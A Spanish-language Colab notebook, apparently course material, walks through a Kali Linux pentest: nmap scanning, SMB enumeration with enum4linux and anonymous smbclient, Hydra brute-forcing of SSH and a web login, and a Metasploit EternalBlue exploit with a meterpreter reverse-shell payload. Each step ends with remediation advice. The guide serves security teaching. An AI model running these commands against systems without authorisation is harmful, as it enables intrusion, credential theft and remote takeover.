<a href="https://colab.research.google.com/github/William-Burbano-Lima/Ciberseguridad-integrador/blob/main/03_dia4_semana4_pentesting.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### 🔥 **Pentesting y Escaneo con Kali Linux - Guía Paso a Paso**  

Kali Linux es una de las mejores distribuciones para pruebas de penetración (**pentesting**). En esta guía, te enseñaré cómo usar Kali Linux para escanear vulnerabilidades y evaluar la seguridad de sistemas y redes.  

---

## **🔍 PASO 1: Instalación y Configuración de Kali Linux**
1️⃣ **Descargar Kali Linux:**  
   - Desde la página oficial: [https://www.kali.org/get-kali/](https://www.kali.org/get-kali/)  
   - Se recomienda usar la versión **Kali Linux Bare Metal** o la imagen para **VMware/VirtualBox**.  

2️⃣ **Arranque de Kali Linux:**  
   - Si lo instalaste en una máquina virtual (VMware o VirtualBox), asegúrate de activar el **Adaptador de red en modo puente**.  
   - Abre una terminal y actualiza los paquetes con:  
     ```bash
     sudo apt update && sudo apt upgrade -y
     ```

3️⃣ **Verificar conectividad y herramientas disponibles:**  
   - Verificar la conexión a internet:  
     ```bash
     ping -c 4 google.com
     ```
   - Revisar las interfaces de red:  
     ```bash
     ip a
     ```

---

## **⚡ PASO 2: Escaneo de Red con Nmap**  
📌 **Objetivo:** Identificar hosts activos, puertos abiertos y servicios en ejecución.  

1️⃣ **Escanear una red para identificar dispositivos activos:**  
   ```bash
   nmap -sn 192.168.1.0/24
   ```
   - `-sn` solo busca dispositivos activos sin escanear puertos.  
   - `192.168.1.0/24` escanea toda la red local.  

2️⃣ **Escaneo rápido de puertos abiertos en un host específico:**  
   ```bash
   nmap -F 192.168.1.10
   ```
   - `-F` escanea puertos comunes.  

3️⃣ **Escaneo detallado con detección de servicios y sistemas operativos:**  
   ```bash
   nmap -sV -O 192.168.1.10
   ```
   - `-sV` detecta versiones de servicios.  
   - `-O` intenta identificar el sistema operativo.  

4️⃣ **Escaneo de todos los puertos TCP en un objetivo:**  
   ```bash
   nmap -p- 192.168.1.10
   ```
   - `-p-` escanea **todos los puertos** (1-65535).  

5️⃣ **Detección de vulnerabilidades con scripts NSE (Nmap Scripting Engine):**  
   ```bash
   nmap --script vuln 192.168.1.10
   ```
   - Busca vulnerabilidades conocidas en el sistema objetivo.  

🔍 **Ejemplo de resultados esperados:**  
```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2 (Ubuntu)
80/tcp   open  http        Apache httpd 2.4.29
3306/tcp open  mysql       MySQL 5.7.26
```
🔹 **Posibles acciones correctivas:**  
- Si el puerto **22 (SSH)** está abierto, se recomienda restringir accesos o cambiar el puerto.  
- Si el puerto **3306 (MySQL)** está abierto a la red pública, se recomienda cerrarlo o protegerlo con un firewall.  

---

## **🔑 PASO 3: Enumeración de Servicios con Enum4Linux**
📌 **Objetivo:** Extraer información sobre usuarios, grupos y recursos compartidos de un sistema Windows/Samba.  

1️⃣ **Enumerar información básica de un servidor Windows:**  
   ```bash
   enum4linux -a 192.168.1.10
   ```
   - `-a` realiza una auditoría completa del sistema.  

2️⃣ **Buscar usuarios en el sistema:**  
   ```bash
   enum4linux -U 192.168.1.10
   ```
   - Extrae la lista de usuarios.  

3️⃣ **Identificar recursos compartidos (shares) accesibles:**  
   ```bash
   smbclient -L 192.168.1.10 -N
   ```
   - `-N` intenta acceder sin autenticación.  

🔍 **Ejemplo de hallazgo:**  
```
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$             Disk      Default share
Users          Disk      Public folder
```
🔹 **Posibles acciones correctivas:**  
- **Restringir accesos a carpetas compartidas sensibles.**  
- **Eliminar el recurso compartido ADMIN$ si no es necesario.**  

---

## **🛠 PASO 4: Ataques de Fuerza Bruta con Hydra**
📌 **Objetivo:** Probar credenciales débiles en servicios SSH, FTP, HTTP, etc.  

1️⃣ **Probar contraseñas en SSH:**  
   ```bash
   hydra -l admin -P rockyou.txt ssh://192.168.1.10
   ```
   - `-l admin` define el usuario objetivo.  
   - `-P rockyou.txt` es un diccionario de contraseñas comunes.  

2️⃣ **Probar en una página web con login HTTP:**  
   ```bash
   hydra -L users.txt -P passwords.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
   ```
   - `-L users.txt` carga una lista de usuarios.  
   - `-P passwords.txt` usa una lista de contraseñas.  
   - `/login.php:user=^USER^&pass=^PASS^:F=incorrect` identifica el patrón de error en la respuesta.  

🔍 **Ejemplo de resultado exitoso:**  
```
[22][ssh] host: 192.168.1.10   login: admin   password: 123456
```
🔹 **Posibles acciones correctivas:**  
- **Forzar políticas de contraseñas seguras.**  
- **Limitar intentos de inicio de sesión con Fail2Ban.**  

---

## **🚀 PASO 5: Explotación de Vulnerabilidades con Metasploit**
📌 **Objetivo:** Comprobar si un sistema es vulnerable a un exploit conocido.  

1️⃣ **Iniciar Metasploit en Kali Linux:**  
   ```bash
   msfconsole
   ```

2️⃣ **Buscar exploits disponibles:**  
   ```bash
   search windows/smb
   ```

3️⃣ **Ejemplo: Explotación de una vulnerabilidad en SMB (EternalBlue - MS17-010):**  
   ```bash
   use exploit/windows/smb/ms17_010_eternalblue
   set RHOSTS 192.168.1.10
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.1.100
   exploit
   ```
   - `set RHOSTS` define el objetivo.  
   - `set PAYLOAD` define el tipo de conexión inversa.  
   - `exploit` lanza el ataque.  

🔍 **Ejemplo de resultado exitoso:**  
```
Meterpreter session opened - Windows shell obtained!
```
🔹 **Posibles acciones correctivas:**  
- **Actualizar sistemas vulnerables.**  
- **Monitorear intentos de explotación en logs y en herramientas como Splunk.**  

---

## **📌 CONCLUSIÓN**
Esta guía cubre un flujo de trabajo esencial en pentesting:  
✅ **Escaneo con Nmap** para identificar puertos abiertos y servicios vulnerables.  
✅ **Enumeración con Enum4Linux** para extraer información valiosa de Windows/Samba.  
✅ **Ataques de fuerza bruta con Hydra** para probar contraseñas débiles.  
✅ **Explotación con Metasploit** para probar vulnerabilidades reales.  

💡 **William Burbano Lima** 😊